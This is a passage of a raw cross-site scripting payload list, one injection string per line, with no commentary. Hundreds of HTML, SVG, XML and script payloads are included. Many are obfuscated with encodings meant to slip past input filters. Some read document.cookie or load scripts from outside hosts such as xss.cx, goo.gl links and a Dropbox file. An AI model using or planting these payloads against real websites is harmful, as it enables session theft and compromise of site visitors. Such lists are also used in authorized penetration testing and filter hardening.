src=\"data:text/html,<script>confirm(1)</script>\">\n<title/>&lt;/title&gt;&lt;iframe/onload=alert(1)&gt;\n</title<marquee/onstart=confirm(1)>xxxx\n'\">*/--></title></style></textarea></script%0A><img src=x onerror=confirm(1)>\n%uff1cscript%uff1econfirm%uff0876310%uff09%uff1c/script%uff1e\n<ul><li><svg onload=\"confirm(1)\"></li></ul>\n<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas<![CDATA[cript:confirm(document.location);\">\n<var onmouseover=\"prompt(1)\">On Mouse Over</var>\n<var onmouseover=\"prompt(1)\">On Mouse Over</var>?\n<var onmouseover=\"prompt(1)\">XSS</var>\n<ſvg><ſcript/href=//⒕₨>\n<video onerror=\"alert(1)\"><source></source></video>\n<video poster=javascript:alert(1)//></video>\n\"<video src=. onerror=prompt(0)>\"\n<video src=. onerror=prompt(0)>\n<video src onloadstart=alert(1)>\n<video src onratechange=\"alert(1)\">\n<video src=\"x\" onloadstart=\"alert(1)\">\n<video src=\"x\" onloadstart=\"confirm(1)\">\n<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23\n<video><source o?UTF-8?Q?n?error=\"confirm(1)\">\n<video><source onerror=\"alert(1)\">\n<w contenteditable id=x onfocus=alert()>\nwith(document)body.appendChild(createElement('iframe onload=&#97&#108&#101&#114&#116(1)>')),body.innerHTML+=''\nx=\"<%\";\n<x data-bind=\".:confirm(1)\">\n<x data-bind=\".:&#x5cu0061lert(1)\">\n<x onload'=confirm(1)\n<x repeat=\"template\" repeat-start=\"999999\">0<y repeat=\"template\" repeat-start=\"999999\">1</y></x>\n<x style=\"background:url('x[a];color:red;/*')\">XXX</x>\n<x style=\"behavior:url(test.sct)\">\n<x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"javascript:alert(1)//#x\"/>\n<x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"test.evt#x\"/>\n<x xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:actuate=\"onLoad\" xlink:href=\"javascript:alert(1)\" xlink:type=\"simple\"/>\n&#x000003C\n&#x000003C;\n&#x000003E\n&#x000003E;\n&#x000003c\n&#x000003c;\n&#x000003e\n&#x000003e;\n&#x00003C\n&#x00003C;\n&#x00003E\n&#x00003E;\n&#x00003c\n&#x00003c;\n&#x00003e\n&#x00003e;\n&#x0003C\n&#x0003C;\n&#x0003E\n&#x0003E;\n&#x0003c\n&#x0003c;\n&#x0003e\n&#x0003e;\n&#x003C\n&#x003C;\n&#x003E\n&#x003E;\n&#x003c\n&#x003c;\n&#x003e\n&#x003e;\n&#x03C\n&#x03C;\n&#x03E\n&#x03E;\n&#x03c\n&#x03c;\n&#x03e\n&#x03e;\n&#x3C\n&#x3C;\n\\x3C\n\\x3Cscript\\x3Ealert(document.domain);\\x3C\\x2Fscript\\x3E\n&#x3E\n&#x3E;\n\\x3E\n&#x3c\n&#x3c;\n\\x3c\n&#x3e\n&#x3e;\n\\x3e\n<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>  \n<xml id=cdcat><note><to>%26lt;span style=x:exp<![CDATA[r]]>ession(confirm(3))%26gt;hello%26lt;/span%26gt;</to></note></xml><table border=%221%22 datasrc=%22%23cdcat%22><tr><td><span datafld=%22to%22 DATAFORMATAS=html></span></td></tr></table>\n<xml id=\"xss\" src=\"test.htc\"></xml><label dataformatas=\"html\" datasrc=\"#xss\" datafld=\"payload\"></label>\n<?xml standalone?>\n<?xml version=\"1.0\" standalone=\"no\"?><html xmlns=\"http://www.w3.org/1999/xhtml\"><head><style type=\"text/css\">@font-face {font-family: y; src: url(\"font.svg#x\") format(\"svg\");} body {font: 100px \"y\";}</style></head><body>Hello</body></html>\n<?xml version=\"1.0\"?><?xml-stylesheet type=\"text/xml\" href=\"#stylesheet\"?><!DOCTYPE doc [<!ATTLIST xsl:stylesheet  id    ID    #REQUIRED>]><svg xmlns=\"http://www.w3.org/2000/svg\">    <xsl:stylesheet id=\"stylesheet\" version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">        <xsl:template match=\"/\">            <iframe xmlns=\"http://www.w3.org/1999/xhtml\" src=\"javascript:alert(1)\"></iframe>        </xsl:template>    </xsl:stylesheet>    <circle fill=\"red\" r=\"40\"></circle></svg>\n<?xml version=\"1.0\"?><?xml-stylesheet type=\"text/xsl\" href=\"data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E\"?><root/>\n<?xml version=\"2.666666666666666666667666666\">\n<xml/>&lt;/xml&gt;&lt;iframe/onload=alert(1)&gt;\n<?xml-stylesheet href=\"javascript:alert(1)\"?><root/>\n<?xml-stylesheet type=\"text/css\" href=\"data:,*%7bx:expression(write(2));%7d\"?>\n<?xml-stylesheet type=\"text/css\"?><!DOCTYPE x SYSTEM \"test.dtd\"><x>&x;</x>\n<?xml-stylesheet type=\"text/css\"?><root style=\"x:expression(write(1))\"/>\n<?xml-stylesheet type=\"text/xsl\" href=\"#\" ?><stylesheet xmlns=\"http://www.w3.org/TR/WD-xsl\"><template match=\"/\"><eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(1)</eval><if expr=\"new ActiveXObject('htmlfile').parentWindow.alert(2)\"></if></template></stylesheet>\n<?xml-stylesheet type=\"text/xsl\" href=\"#\"?><img xmlns=\"x-schema:test.xdr\"/>\n<xmp><img alt=\"</xmp><img src=xx:x onerror=confirm(1)//\">\n<xmp/>&lt;/xmp&gt;&lt;iframe/onload=alert(1)&gt;\n<xmp><%</xmp><img alt='%></xmp><img src=xx:x onerror=alert(1)//'><script>x='<%'</script> %>/alert(2)</script>XXX<style>*['<!--']{}</style>-->{}*{color:red}</style>\n\"><<x>script>confirm(2)<<x>/<x>script>\n!#$%&'*+-/=?^_`{}|~@xss.cx\n\"xss'cx</img\nxss=<link rel=import href=http://xss.cx/xss.js >\nxss--><!--<script>xss\n<x:template xmlns:x=\"http://www.wapforum.org/2001/wml\"  x:ontimer=\"$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)\"><x:timer value=\"1\"/></x:template>\nx”</title><img src%3dx onerror%3dconfirm(1)>\n<%/z=%&gt&lt;p/&#111;nresize&#x3d;alert(1)//>\n<%/z=%&gt&lt;p/onresize=alert(1)//>\n<svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){\ndata:html=1;alert(1)/*,<body%20onload=eval(location.href)><title>*/;alert(2)}\n<details open ontoggle=\"alert(1)\">\n<script>for(var i=0;i>=0;i++){alert(Math.random()); alert(document.cookie);}</script>\n%3Cdiv%20style=writing-mode:vertical-rl%3Boverflow:scroll%20onscroll=alert(1)%3E\n%3Cdiv%20style=writing-mode:tb%3Boverflow:scroll%20onscroll=alert(1)%3E\n%3Cdiv%20style=writing-mode:tb-rl%3Boverflow:scroll%20onscroll=alert(1)%3E\n%3Cdiv%20style=-webkit-writing-mode:vertical-rl%3Boverflow:scroll%20onscroll=alert(1)%3E\n</script/x><scr<script>ipt>alert(1)</script/x>\n<%/%=%&#62<&#112/&#111&#110&#114&#101&#115&#105&#122&#101=&#97&#108&#101&#114&#116(1)//>\n<%/%=%><p/onresize=alert(1)//>\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><x:script\nxmlns:x=\"http://www.w3.org/1999/xhtml \">alert(1&#00000041;\n<svg onload=document.writeln(decodeURI(location.hash))>#<img src=onerror=alert(1)>\n<img src=\\\\?\\UNC\\\\\\></style>\n\"><input type=\"submit\" formaction=\"javascript&colon;this&lsqb;'a'&plus;'lert'&rsqb;`1`\"\n<script>delete prompt;prompt(1)</script>\n<svg onload = alert('&#x000005cu0031')>\n<x ng-focus=x=$event id=f tabindex=0><x ng-if=[1].map(x.view.alert)>\n\"%0a/><script>//alert(1)//\n<SCRIPT FOR=window EVENT=onfocus>alert(1)</SCRIPT>\n<svg><x><script>alert(1)</x>\nprompt(top.dump?'Firefox':top.Debug?'IE':top.Rect?'Safari':'Chrome')\n<script/src=//⑭.₨>\n<OBJECT classid=clsid:8856F961-340A-11D0-A96B-00C04FD705A2><PARAM NAME=Location VALUE=http://xss.cx>\n<script>a=`jackmasa<!--<script/\\`;</script>\n<input value=\"${alert(1)}`</script/\">\n<dialog open=\"\" onclose=\"alert(1)\"><form method=\"dialog\"><button>Close me!</button></form></dialog>\n<svg><script>prompt&#40 1&#41<i>\n<iframe/src=\"data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload =confirm(1);>\";>\n<svg xmlns:xlink=\"http://www.w3.org/1999/xlink\"><a><circle r=100 /><animate attributeName=\"xlink:href\" values=\";javascript:alert(1)\" begin=\"0s\" dur=\"0.1s\" fill=\"freeze\"/>\n<input type=\"text\" value=\"\"onresize=pompt(1) \"> // IE 10 docmode\n<a href=\"&#1;javascript:alert(1)\">CLICK ME<a>\n<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)\n<img src=\"a\" onerror='eval(atob(\"cHJvbXB0KDEpOw==\"))'>\n<link%20rel=import%20href=http://avlidienbrunn.se/test.php>\n<link/rel=prefetch&#10import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4g>\n<link rel=\"import\" href=\"data:text/html&comma;&lt;script&gt;alert(document.domain)&lt ;&sol;script&gt;\n<video src=_ onloadstart=\"alert(1)\">\n<iframe%0Aname=\"javascript:\\u0061\\u006C\\u0065\\u0072\\u0074(1)\" %0Aonload=\"eval(name)\";>\n<math><XSS href=\"javascript:alert(location)\">aaa\n“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//\njavascript://--></script></title></style>\"/</textarea>*/<alert()/*' onclick=alert()//>a\njavascript://</title>\"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/\njavascript://</title></style></textarea>--></script><a\"//' onclick=alert()//>*/alert()/*\njavascript://'//\" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*\njavascript://</title></textarea></style></script --><li '//\" '*/alert()/*', onclick=alert()//\njavascript:/*-- >]]>%>?></script></title></textarea></noscript></style></xmp>\">[img=1,name=/alert(1)/.source]<img - /style=a:expression&#40&#47&#42'/- /*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms- behavior:url(#default#time2) name=alert(1)onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>\"\n<sCRiPt>alert(1);</sCRipT>\n<SCriPt>delete alert;alert(1)</sCriPt>\n<script%20src=\"//www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1\">\n<svg><script>alert&grave;1&grave;<p>\n<svg><script>alert&DiacriticalGrave;1&DiacriticalGrave;<p>\n\"><svg><script>alert`1`\n<script%0a%0dConfirm(1);</script>\n<scr<script>ipt>alert(1)</scr<script>ipt>\n<a href=”http://www.google.com>Clickme</a>\n<a href=”javascript:”>Clickme</a>\n<a href=”javaScrRipt:alert(1)”>Clickme</a>\n<a/href=\"j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:confirm&lpar;1&rpar;\">Click<test>\n<a href=\"j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;confirm&lpar;1&rpar;\">Click<test>\n<a href=\"j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\\u0061\\u006C\\u0065\\u0072\\u0074&lpar;1&rpar;\" >Click<test>\n\"><a fooooooooooooooooooooooooooooooooo href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B%>\n<a href='javascript:http://@cc_on/confirm%28location%29'>click</a>\n<a href=\"data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">Click<test>\n<a/href=data&colon;text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==>ClickMe</a>\n<a/href=data&colon;text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==>ClickMe</a>\n<a href=\"data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt\">Click<test>\n<a href=\"rhainfosec.com\" onmouseover=alert(1)>ClickHere</a>\n<a href=\"rhainfosec.com\" onclimbatree=alert(1)>ClickHere</a>\n<form oninput=alert(1)></input></form>\n<q/oncut=alert(1)>\n<body/onhashchange=alert(1)><a href=#>clickit\n--><d/ /ondrag=co\\u006efir\\u006d(2)>hello.\n\"><p id=\"\"onmouseover=\\u0070rompt(1) //\n<img src=x onerror=prompt(1);>\n<img/src=aaa.jpg onerror=prompt(1);>\n<video src=x onerror=prompt(1);>\n<audio src=x onerror=prompt(1);>\n<iframe src=x onerror=prompt(1)>\n<video><source onerror=\"javascript:alert(1)\">\n<embed/src=//goo.gl/nlX0P>\n<form action=\"Javascript:alert(1)\"><input type=submit> // Firefox, IE\n<isindex action=\"javascript:alert(1)\" type=image> // Firefox, IE\n<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image> Google Chrome, IE\n<isindex x=\"javascript:\" onmouseover=\"alert(1)\" label=\"test\"> // Firefox, IE\n<form/action='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK // Mario\n<button form=x>xss<form id=x action=\"javas&Tab;cript:alert(1)\"//\n<form><isindex formaction=\"java&Tab;s&NewLine&cript&colon;confirm(1)\">\n<input type=\"image\" formaction=JaVaScript:alert(0)>\n<form><input type=\"image\" value=\"submit\" formaction=//goo.gl/nlX0P>\n<embed/code=//goo.gl/nlX0P?\n<embed/src=”//goo.gl/nlX0P”>\n<object data=//0me.me/demo/xss/xssproject.swf?js=alert(document.domain); allowscriptaccess=always></object> // Soroush Dallili\n<object/data=”//goo.gl/nlX0P”>\n<object data=\"javascript:alert(1)\"> // FF <object/data=\"javascript&colon;alert(1)\"> // FF <object data=\"&#x6A;avascript&colon;alert(1)\">\n<object data=\"&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&# x72;&#x74;&#x28;&#x31;&#x29;\">\n<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\"> // Firefox only\n<object data=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB 4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy 8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\"></object> // Firefox only\n<svg/onload=prompt(1);>\n<marquee/onstart=confirm(2)>/\n<body onload=prompt(1);>\n<marquee/finish=confirm(2)>/\n<select autofocus onfocus=alert(1)>\n<textarea autofocus onfocus=alert(1)>\n<keygen autofocus onfocus=alert(1)>\n<body oninput=alert(document.domain)><input autofocus></br>\n<img src=x onerror=\"javascript:window.onerror=alert;throw 1\">\n<body/onload=javascript:window.onerror=eval;throw'=alert\\x281\\x29';>\n<script>alert`1`</script>\n<img src=x onerror=prompt`1`>\n<a onmouseover=location=’javascript:alert(1)>click\n<a onmouseover=location='&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#10 1&#114&#116&#40&#49&#41'>a<a>\n<body onfocus=\"location='javascrpt:alert(1) >123\n<SCRIPT LANGUAGE=\"VBScript\">%0a%0dFunction window_onload%0a%0dAlert 1%0a%0dEnd Function </SCRIPT>\n<body language=vbs onload=alert-1 // IE-8\n<script type=text/vbscript>msgbox document.location</script> // IE 10\n<img language=vbscript src=<b onerror=\"alert 1\"> // IE 8\n<svg/language=vbs onload=msgbox-1\n<svg xmlns=\"http://www.w3.org/2000/svg\"><g onload=\"javascript:\\u0061lert(1);\"></g></svg> // By Secalert\n<svg xmlns:xlink=\"http://www.w3.org/1999/xlink\"><a><circle r=100 /><animate attributeName=\"xlink:href\" values=\";javascript:alert(1)\" begin=\"0s\" dur=\"0.1s\" fill=\"freeze\"/> // By Mario\n<svg><![CDATA[><imagexlink:href=\"]]><img/src=xx:xonerror=alert(2)//\"></svg> // By Secalert\n<meta content=\"&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)\" http-equiv=\"refresh\"/>\n<input type=\"text\"value=\"\"onclick=\"location=window[`atob`]`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21ha W4p`\"/>\n<input type=\"text\" value=\"\"onfocus=location='javascript:alert`1`' autofocus\"\"/>\n<svg><div onactivate=alert('Xss') id=xss style=overflow:scroll>\n<div onfocus=alert('xx') id=xss style=display:table>\n<body/onactivate=alert(1)>\n<base href=data:/,0/><script src=alert(1)></script>\n<base href=javascript:/0/><iframe src=,alert(1)></iframe>\n<anything onbeforescriptexecute=confirm(1)>\n<frameset/onpageshow=alert(1)>\n<body/onpageshow=alert(1)>\n<div style=overflow:-webkit-marquee onscroll=alert(1)>\n<div style=\"-ms-scroll- limit:1px;overflow:scroll;width:1px\" onscroll=alert('xss')>\n<object onerror=alert(1)>\n<svg><use xlink:href=\"data:image&sol;svg&plus;xml&semi;ba &NewLine;se&Tab;64&semi;&comma;PHN2ZyBpZD 0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53M y5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodH RwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3a WR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+DQo8 YSB4bGluazpocmVmPSJqYXZhc2NyaXB0OmFsZXJ0K GxvY2F0aW9uKSI+PHJlY3QgeD0iMCIgeT0iMCIgd2lk dGg9IjEwMCIgaGVpZ2h0PSIxMDAiIC8+PC9hPg0KPC 9zdmc+#rectangle\" /></svg>\n<audio src=\"data:audio/mp3,%FF%F3%84%C4%FF%F3%14% C4\" oncanplay=\"alert(1)\">\n<IFRAME/SRC=JAVASCRIPT:%61%6c%65%72%74%28%31%29></iframe> // Cross Browser (PEPE Vila)\n<SCRIPT/SRC=HTTP://LINKTOJS/></SCRIPT> // Cross Browser\n<SVG/ONLOAD=&#112&#114&#111&#109&#112&#116(1) // Cross Browser\n<SCRIPT/SRC=DATA:,%61%6c%65%72%74%28%31%29></SCRIPT> //Cross Browser (PEPE Vila)\n<SCRIPT/SRC=\"DATA:TEXT/JAVASCRIPT;BASE64,YSA9CSIJCWMJCW8JCW4JCXMJCXQJCXIJCXUJCXAJCW0JKDEJ KTEJCSIJICA7IEI9W10JICA7QT0JCTIJICA7CWM9CWEJW0EJCV0JICA7QT0JCTUJICA7CW89CWEJW0EJCV0JICA7QT 0JCUEJK0EJLTEJLTEJICA7CW49CWEJW0EJCV0JICA7QT0JIEEJK0EJLTUJICA7CXM9CWEJW0EJCV0JICA7QT0JIEEJCS 0JLTMJICA7CXQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXI9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CX U9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXA9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CW09CWEJW0E JCV0JICA7QT0JIEEJCS0JLTIJICA7CUQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CUU9CWEJW0EJCV0JICA7QT0 JIEEJCS0JLTEJICA7CUY9CWEJW0EJCV0JICA7IEM9ICBCW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV 0JW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV0JICA7IEMJKHAJK3IJK28JK20JK3AJK3QJK0QJK0YJK0 UJKSAJKCAJKSAJICA7\"></SCRIPT>\n\\”;alert(1)//\n\\\\”;alert(1)//\n<script>\\u0061\\u006C\\u0065\\u0072\\u0074(1)</script> // Unicode escapes\n<script>\\u0061\\u006C\\u0065\\u0072\\u0074`1`</script> // ES6 Variation\n<script>\\u{61}\\u{6c}\\u{65}\\u{72}\\u{74}(1)</script> // ES6 Variation\n<script>eval(\"\\x61\\x6c\\x65\\x72\\x74(1)\");</script> // Hexadecimal escapes using eval\n<script>eval(\"\\141\\154\\145\\162\\164`1`\")</script> // Octal escapes combined ES6 Diacritical Grave\n<script>setTimeout(\"a\" + \"lert\" + \"(1)\");</script> // Using Basic Concatenation\n<img src=a onerror=setInterval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))> // Using String.fromcharcode function\n<script>setTimeout(/a/.source + /lert/.source + \"(1)\");</script> // Using source property for concatenation\n[].constructor.constructor(\"alert\" + \"(1)\")()\nwindow[\"alert\"](1)\neval(\"ale\" + (!![]+[])[+!+[]]+(!![]+[])[+[]])(1)\nwindow[\"ale\" + (!![]+[])[+!+[]]+(!![]+[])[+[]]](1)\nalert(document[\"cook\" + ([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]])\nalert(this[\"\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\" ][\"cook\" + ([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]])\n<a href=\"&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#1 14&#109&#40&#49&#41\">Clickhere</a>\n<a href=\"&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38& #35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#4 9&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#57&#38&#35&#49&#49&#49& #38&#35&#49&#49&#48&#38&#35&#49&#48&#50&#38&#35&#49&#48&#53&#38&#35&#49&#49&#52&#3 8&#35&#49&#48&#57&#38&#35&#52&#48&#38&#35&#52&#57&#38&#35&#52&#49\">Clickhere</a>\n<script' + Array(999999).join('/') + '>alert(1)<\\/script>\n#”><img src=x onerror=prompt(1)>\n<svg/onload=eval(location.hash.slice(1))>?#alert(1)\n<svg/onload=eval(atob(location.hash.slice(1)))>#YWxlcnQoMSkvLw==\n<marquee/onstart=document.body.innerHTML=location.hash>//#<img src=x onerror=prompt(1)>>\n<marquee/onstart=this['innerHTML']=location.hash;>//#<img src=x onerror=alert(document.domain)>\n<marquee/onstart=this['innerHTML']=unescape(location.hash);>//#<img src=x onerror=alert(document.domain)>\n<svg%20onload=evt.target.innerHTML=evt.target.ownerDocument.URL>#<img src=/ onerror=alert(domain)>\n<svg onload=evt.target[/innerHT/.source%2b/ML/.source]=evt.target[/ownerDocumen/.source%2b/t/.source][/U R/.source%2b/L/.source]#<img src=/ onerror=alert(domain)>\n<svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]#:()\n<svg onload=eval(window.name)//\n<svg/onload=location=name//\n<body/onload=location=name//\n<body/onload=location=write(top)//\n<svg/onload=location=name//>\nlocation=name//','javascript:alert(1)');\n<svg/onload=location=name//”>CLICK</a>\n<body/onload=URL=name//\n<body/onactivate=URL=name//\n<svg/onload=top[‘loca’%2b’tion’]=name//\n<svg/onload=top[/loca/.source%2b/tion/.source]=name//\n<body/onload=this[/loca/.source%2b/tion/.source]=name//\n<svg/onload=parent[/loca/.source%2b/tion/.source]=name//\n<body/onload=self[/loca/.source%2b/tion/.source]=name//\n<body/onload=window[/loca/.source%2b/tion/.source]=name//\n<svg/onload=body[name]=URL%0d#</svg><img src=x onerror=alert(1)>\"\n<scri%00pt>alert(1);</scri%00pt>\n<div style=\"color:rgb(''&#0;x:expression(alert(1))\"></div>\n<div/style=\"width:expression(confirm(1))\">X</div>\n<meta http-equiv=\"x-ua-compatible\" content=\"ie=7\"><iframe src=”//targetsite.com?xss=<div/style=\"width:expression(confirm(1))\">X</div>”\n<meta http-equiv=\"x-ua-compatible\" content=\"ie=9\"><iframe src=//targetsite?xss=<svg/onload%00=%00locatio%00n=nam%00e name=javascript:alert(document.domain)>\n<a onmouseover%0B=location=%27\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3 B\\x63\\x6F\\x6E\\x66\\x69\\x72\\x6D\\x26\\x6C\\x70\\x61\\x72\\x3B\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x63\\x 6F\\x6F\\x6B\\x69\\x65\\x26\\x72\\x70\\x61\\x72\\x3B%27>CLICK\n<svg %09onload%09=prompt(1)>\n<svg/onload%0B=prompt(1)>\n<svg%09%28%3Bonload=confirm(1);>\ncharset=utf-8&v=”><img src=x onerror=prompt(0);>\ncharset=utf- 32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80\na=%1B$*H%1BN&b=%20type=image%20src=x%20onerror=alert(document.c haracterSet);//\n<// style=x:expression\\28write(1)\\29>\n</**/style=x:expression\\28write(1)\\29>\n<% contenteditable onresize=alert(1)>\n<svg%0donload=alert(0)>\n<body onload=```${prompt``}`>\n<iframe src=\"http://target\" referrerpolicy=\"no-referrer\">\ndata:text/html;alert(1)/*,<svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){}\n<a href=\"\" onclick=``/name==alert(1)>clickme</a>\n<a href=\"\" onclick=``/*/alt=\"*//alert(1)//\">clickme</a>\n<form id=\"test\"></form><button form=\"test\" formaction=\"javascript:alert(1)\">X</button>\n<meta charset=\"x-imap4-modified-utf7\">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi\n<meta charset=\"x-imap4-modified-utf7\">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>\n0?<script>Worker(\"#\").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))\n<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>\n<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>\n<input onfocus=write(1) autofocus>\n<input onblur=write(1) autofocus><input autofocus>\n<a style=\"-o-link:'javascript:alert(1)';-o-link-source:current\">X</a>\n<video poster=javascript:alert(1)//></video>\n<svg xmlns=\"http://www.w3.org/2000/svg\"><g onload=\"javascript:alert(1)\"></g></svg>\n<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>\n<x repeat=\"template\" repeat-start=\"999999\">0<y repeat=\"template\" repeat-start=\"999999\">1</y></x>\n<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>\n<script>({0:#0=alert/#0#/#0#(0)})</script>\nX<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >\n<?xml-stylesheet href=\"javascript:alert(1)\"?><root/>\n<script xmlns=\"http://www.w3.org/1999/xhtml\">&#x61;l&#x65;rt&#40;1)</script>\n<meta charset=\"x-mac-farsi\">Â¼script Â¾alert(1)//Â¼/script Â¾\n<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>\n<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>\n<input onblur=focus() autofocus><input>\n<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>\n1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(1)&gt;`>\n<script src=\"#\">{alert(1)}</script>;1\n+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);\n<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>\n1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2)  attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(1)&gt;>\n<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d\n<style>@import \"data:,*%7bx:expression(write(1))%7D\";</style>\n<frameset onload=alert(1)>\n<table background=\"javascript:alert(1)\"></table>\n<a style=\"pointer-events:none;position:absolute;\"><a style=\"position:absolute;\" onclick=\"alert(1);\">XXX</a></a><a href=\"javascript:alert(2)\">XXX</a>\n1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% 